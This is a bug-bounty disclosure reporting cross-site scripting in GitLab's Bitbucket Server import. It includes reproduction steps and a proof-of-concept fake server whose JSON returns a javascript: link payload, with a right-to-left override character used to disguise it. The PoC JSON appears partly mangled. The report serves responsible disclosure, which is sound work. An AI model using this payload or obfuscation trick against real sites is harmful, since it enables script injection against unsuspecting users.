Cross-Site Scripting In BitbucketServer Import
HackerOne report #638698 by nyangawa
on 2019-07-10, assigned to estrike
The BitbucketServerImport::Importer
of GitLab trusts the response from a (maybe-malicious) Bitbucket server without sanitizing links of repositories. An attacker could set up a fake Bitbucket server and ask the victim to try to import repositories from it, the XSS payload could be triggered by the victim when he checks the links of the candidate repositories.
Steps to reproduce
- Select "New Project" > "Import Project" > "Bitbucket Server"
- Fill the form, with "" in URL field, and random username/password.
- Click the link of the first repository.
the source code of the PoC server is like:
get '/rest/api/1.0/repos' do
content_type :json
def repos_resp
"size": 1,
"limit": 25,
"isLastPage": true,
"values": [
"slug": "\"",
"id": 1,
"name": "My repo",
"description": "My repo description",
"scmId": "git",
"state": "AVAILABLE",
"statusMessage": "Available",
"forkable": true,
"project": {
"key": "PROJECT",
"id": 1,
"name": "My Cool Project",
"description": "The description for my cool project.",
"public": true,
"type": "NORMAL",
"links": {
"self": [
"href": "http://link/to/project"
"public": true,
"links": {
"clone": [
"href": "ssh://git@<baseURL>/PRJ/my-repo.git",
"name": "ssh"
"href": "https://<baseURL>/scm/PRJ/my-repo.git",
"name": "http"
"self": [
"href": "jAvAsCrIpT:\"Click HERE!!\u202e\";alert(document.domain)"
"start": 0
in the link is used as an example of a possible obfuscation trick.
Results of GitLab environment info
I tested this on
It's a common XSS attacking vector, and user interactions are required to complete the attack. The attacker could use some obfuscation tricks to hide the real purpose of the payload. However, it's easy for users with caution to protect themselves from being attacked. So I think the impact is low.
Warning: Attachments received through HackerOne, please exercise caution!